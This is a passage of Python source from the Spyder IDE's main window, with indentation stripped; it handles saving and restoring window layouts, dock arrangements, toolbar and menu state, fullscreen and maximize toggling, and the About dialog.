self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
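# hexstate is the hex-encoded QMainWindow state produced by
# qbytearray_to_str(self.saveState()) in get_window_settings(); it is
# decoded back into a QByteArray before being passed to restoreState().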
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState()
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
plugin.initialize_plugin_in_mainwindow_layout()
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time."""
self.setUpdatesEnabled(False)
first_spyder_run = bool(self.first_spyder_run) # Store copy
if first_spyder_run:
self.set_window_settings(*settings)
else:
if self.last_plugin:
if self.last_plugin.ismaximized:
self.maximize_dockwidget(restore=True)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
min_width = self.minimumWidth()
max_width = self.maximumWidth()
base_width = self.width()
self.setFixedWidth(base_width)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# Define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
plots = self.plots
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
# Stored for tests
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# --------------------------------------------------------------------
# Layouts are organized by columns, each column is organized by rows.
# Widths have to add up to 1.0 (except if hidden); heights per column
# have to add up to 1.0 as well
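# Each layout below is a dict with 'widgets' (a list of columns, where
# each column is a list of rows and each row is a list of plugins that
# get tabified together), the width/height fractions, and the widgets
# and toolbars to hide for that layout.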
# Spyder Default Initial Layout
s_layout = {
'widgets': [
# Column 0
[[explorer_project]],
# Column 1
[[editor]],
# Column 2
[[outline]],
# Column 3
[[help_plugin, explorer_variable, plots, # Row 0
helper, explorer_file, finder] + plugins,
[console_int, console_ipy, history]] # Row 1
],
'width fraction': [0.05, # Column 0 width
0.55, # Column 1 width
0.05, # Column 2 width
0.45], # Column 3 width
'height fraction': [[1.0], # Column 0, row heights
[1.0], # Column 1, row heights
[1.0], # Column 2, row heights
[0.46, 0.54]], # Column 3, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# RStudio
r_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int]], # Row 1
# column 1
[[explorer_variable, plots, history, # Row 0
outline, finder] + plugins,
[explorer_file, explorer_project, # Row 1
help_plugin, helper]]
],
'width fraction': [0.55, # Column 0 width
0.45], # Column 1 width
'height fraction': [[0.55, 0.45], # Column 0, row heights
[0.55, 0.45]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Matlab
m_layout = {
'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, plots, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [0.10, # Column 0 width
0.45, # Column 1 width
0.45], # Column 2 width
'height fraction': [[0.55, 0.45], # Column 0, row heights
[0.55, 0.45], # Column 1, row heights
[0.55, 0.45]], # Column 2, row heights
'hidden widgets': global_hidden_widgets,
'hidden toolbars': [],
}
# Vertically split
v_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int, explorer_file, # Row 1
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [1.0], # Column 0 width
'height fraction': [[0.55, 0.45]], # Column 0, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Horizontally split
h_layout = {
'widgets': [
# column 0
[[editor]], # Row 0
# column 1
[[console_ipy, console_int, explorer_file, # Row 0
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [0.55, # Column 0 width
0.45], # Column 1 width
'height fraction': [[1.0], # Column 0, row heights
[1.0]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': []
}
# Layout selection
layouts = {
'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout,
}
layout = layouts[index]
# Remove None from widgets layout
widgets_layout = layout['widgets']
widgets_layout_clean = []
for column in widgets_layout:
clean_col = []
for row in column:
clean_row = [w for w in row if w is not None]
if clean_row:
clean_col.append(clean_row)
if clean_col:
widgets_layout_clean.append(clean_col)
# Flatten widgets list
widgets = []
for column in widgets_layout_clean:
for row in column:
for widget in row:
widgets.append(widget)
# Make every widget visible
for widget in widgets:
widget.toggle_view(True)
widget.toggle_view_action.setChecked(True)
# We use both directions to ensure proper update when moving from
# 'Horizontal Split' to 'Spyder Default'
# This also seems to help on random cases where the display seems
# 'empty'
for direction in (Qt.Vertical, Qt.Horizontal):
# Arrange the widgets in one direction
for idx in range(len(widgets) - 1):
first, second = widgets[idx], widgets[idx+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
direction)
# Arrange the widgets in the other direction
for column in widgets_layout_clean:
for idx in range(len(column) - 1):
first_row, second_row = column[idx], column[idx+1]
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout_clean:
for row in column:
for idx in range(len(row) - 1):
first, second = row[idx], row[idx+1]
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Set dockwidget widths
width_fractions = layout['width fraction']
if len(width_fractions) > 1:
_widgets = [col[0][0].dockwidget for col in widgets_layout]
self.resizeDocks(_widgets, width_fractions, Qt.Horizontal)
# Set dockwidget heights
height_fractions = layout['height fraction']
for idx, column in enumerate(widgets_layout_clean):
if len(column) > 1:
_widgets = [row[0].dockwidget for row in column]
self.resizeDocks(_widgets, height_fractions[idx], Qt.Vertical)
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
if first_spyder_run:
self.first_spyder_run = False
else:
self.setMinimumWidth(min_width)
self.setMaximumWidth(max_width)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
self.setUpdatesEnabled(True)
self.sig_layout_setup_ready.emit(layout)
return layout
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
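# Example: with active layouts ['default', 1, 4] and current_index 1,
# 'next' wraps to index 2 and 'previous' goes back to index 0 thanks to
# the modulo above (example values are hypothetical).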
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make a new layout active, even if it overwrites an
# inactive layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The defaults layouts will always be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (i.e., where the index is greater than the number of
# defaults). See issue 6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
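# e.g. a writable editor widget yields (False, True, True): not a
# console, not read-only, and therefore a read/write editor.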
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if not console and not_readonly and not self.editor.is_file_opened():
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'ipython_console', 'variable_explorer',
'help', 'plots', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console', None]
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
if plugin.isAncestorOf(self.last_focused_widget):
plugin.visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.close_window()
if not plugin.closing_plugin(cancelable):
return False
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.lspmanager.shutdown()
self.already_closed = True
return True
def add_dockwidget(self, child):
"""Add QDockWidget and toggleViewAction"""
dockwidget, location = child.create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(dockwidget.features()|
QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
if plugin.isAncestorOf(widget):
plugin.toggle_view_action.setChecked(False)
break
def toggle_lock(self, value):
"""Lock/Unlock dockwidgets and toolbars"""
self.interface_locked = value
CONF.set('main', 'panes_locked', value)
# Apply lock to panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
if self.interface_locked:
if plugin.dockwidget.isFloating():
plugin.dockwidget.setFloating(False)
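# An empty QWidget as the title bar (set below) hides the dockwidget's
# native title bar and its float/close buttons, which is what visually
# locks the pane in place.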
plugin.dockwidget.setTitleBarWidget(QWidget())
else:
plugin.dockwidget.set_title_bar()
# Apply lock to toolbars
for toolbar in self.toolbarslist:
if self.interface_locked:
toolbar.setMovable(False)
else:
toolbar.setMovable(True)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.dockwidget.hide()
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
# so last_plugin can be None after the above for loop.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
self.setCentralWidget(self.last_plugin)
self.last_plugin.ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
self.last_plugin.show()
self.last_plugin.visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
self.last_plugin.ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.fullscreen_flag:
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.fullscreen_flag:
self.fullscreen_flag = False
if os.name == 'nt':
self.setWindowFlags(
self.windowFlags()
^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint))
self.setGeometry(self.saved_normal_geometry)
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.saved_normal_geometry = self.normalGeometry()
if os.name == 'nt':
# Due to limitations of the Windows DWM, compositing is not
# handled correctly for OpenGL based windows when going into
# full screen mode, so we need to use this workaround.
# See Issue #4291.
self.setWindowFlags(self.windowFlags()
| Qt.FramelessWindowHint
| Qt.WindowStaysOnTopHint)
screen_number = QDesktopWidget().screenNumber(self)
if screen_number < 0:
screen_number = 0
r = QApplication.desktop().screenGeometry(screen_number)
self.setGeometry(
r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2)
self.showNormal()
else:
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def about(self):
"""Create About Spyder dialog with general information."""
versions = get_versions()
# Show Git revision for development version
revlink = ''
if versions['revision']:
rev = versions['revision']
revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
"commit/%s'>Commit: %s</a>)" % (rev, rev)
# Get current font properties
font = self.font()
font_family = font.family()
font_size = font.pointSize()
if sys.platform == 'darwin':
font_size -= 2
msgBox = QMessageBox(self)
msgBox.setText(
"""
<div style='font-family: "{font_family}";
font-size: {font_size}pt;
font-weight: normal;
'>
<p>
<b>Spyder {spyder_ver}</b> {revision}
<br>
The Scientific Python Development Environment |
<a href="{website_url}">Spyder-IDE.org</a>
<br>
Copyright © 2009-2019 Spyder Project Contributors and
<a href="{github_url}/blob/master/AUTHORS.txt">others</a>.
<br>
Distributed under the terms of the
<a href="{github_url}/blob/master/LICENSE.txt">MIT License</a>.
</p>
<p>
Created by Pierre Raybaut; current maintainer is Carlos Cordoba.
Developed by the
<a href="{github_url}/graphs/contributors">international
Spyder community</a>. Many thanks to all the Spyder beta testers
and dedicated users.
</p>
<p>For help with Spyder errors and crashes, please read our
<a href="{trouble_url}">Troubleshooting Guide</a>, and for bug
reports and feature requests, visit our
<a href="{github_url}">Github site</a>. For project discussion,
see our <a href="{forum_url}">Google Group</a>.
</p>
<p>
This project is part of a larger effort to promote and
facilitate the use of Python for scientific and engineering
software development.
The popular Python distributions
<a href="https://www.anaconda.com/download/">Anaconda</a> and
<a href="https://winpython.github.io/">WinPython</a>
also contribute to this plan.
</p>
<p>
Python {python_ver} {bitness}-bit | Qt {qt_ver} |
{qt_api} {qt_api_ver} | {os_name} {os_ver}
</p>
<p><small>Certain source files under other compatible permissive
licenses and/or originally by other authors.
Spyder 3 theme icons derived from
<a href="https://fontawesome.com/">Font Awesome</a> 4.7
(© 2016 David Gandy; SIL OFL 1.1) and
<a href="http://materialdesignicons.com/">Material Design</a>
(© 2014 Austin Andrews; SIL OFL 1.1).
Most Spyder 2 theme icons sourced from the
<a href="https://www.everaldo.com">Crystal Project iconset</a>
(© 2006-2007 Everaldo Coelho; LGPL 2.1+).
Other icons from
<a href="http://p.yusukekamiyamane.com/">Yusuke Kamiyamane</a>
(© 2013 Yusuke Kamiyamane; CC-BY 3.0),
the <a href="http://www.famfamfam.com/lab/icons/silk/">FamFamFam
Silk icon set</a> 1.3 (© 2006 Mark James; CC-BY 2.5), and
the <a href="https://www.kde.org/">KDE Oxygen icons</a>
(© 2007 KDE Artists; LGPL 3.0+).</small>
</p>
<p>
See the <a href="{github_url}/blob/master/NOTICE.txt">NOTICE</a>
file for full legal information.
</p>
</div>
""".format(
spyder_ver=versions['spyder'],
revision=revlink,
website_url=__website_url__,
github_url=__project_url__,
trouble_url=__trouble_url__,
forum_url=__forum_url__,
python_ver=versions['python'],
bitness=versions['bitness'],
qt_ver=versions['qt'],
qt_api=versions['qt_api'],
qt_api_ver=versions['qt_api_ver'],
os_name=versions['system'],
os_ver=versions['release'],
font_family=font_family,
font_size=font_size,
)
)
msgBox.setWindowTitle(_("About %s") % "Spyder")
msgBox.setStandardButtons(QMessageBox.Ok)
from spyder.config.gui import is_dark_interface
if PYQT5:
if is_dark_interface():
icon_filename = "spyder.svg"
else:
icon_filename = "spyder_dark.svg"
else:
if is_dark_interface():
icon_filename = "spyder.png"
else:
icon_filename = "spyder_dark.png"
app_icon = QIcon(get_image_path(icon_filename))
